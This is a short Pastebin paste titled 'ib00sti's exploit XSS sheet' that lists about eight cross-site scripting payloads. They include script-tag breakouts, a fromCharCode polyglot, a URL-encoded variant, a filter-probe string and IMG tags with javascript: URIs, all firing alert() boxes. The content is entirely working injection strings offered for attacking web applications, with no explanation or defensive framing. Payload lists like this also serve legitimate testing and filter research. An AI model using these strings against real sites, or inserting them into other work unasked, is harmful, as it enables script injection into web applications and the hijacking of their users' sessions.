Advertisement
ib00sti

ib00stiXSS

Apr 23rd, 2019
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. ib00sti's exploit XSS sheet;
  2.  
  3.  
  4. -------
  5.  
  6. "><script>alert(1)</script>
  7.  
  8. -------
  9.  
  10. ';alert(String.fromCharCode(88,83,83))//\';aler
  11. t(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCo
  12. de(88,83,83))//--></SCRIPT>'>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  13.  
  14. -----------
  15.  
  16. %5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
  17.  
  18. -----------
  19.  
  20. '';!--"<XSS>=&{()}
  21.  
  22. ----------
  23.  
  24. <IMG SRC="javascript:alert('ib00sti');">
  25.  
  26. -----------
  27.  
  28. <IMG """><SCRIPT>alert("ib00sti")</SCRIPT>">
  29.  
  30. ------------
  31.  
  32. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement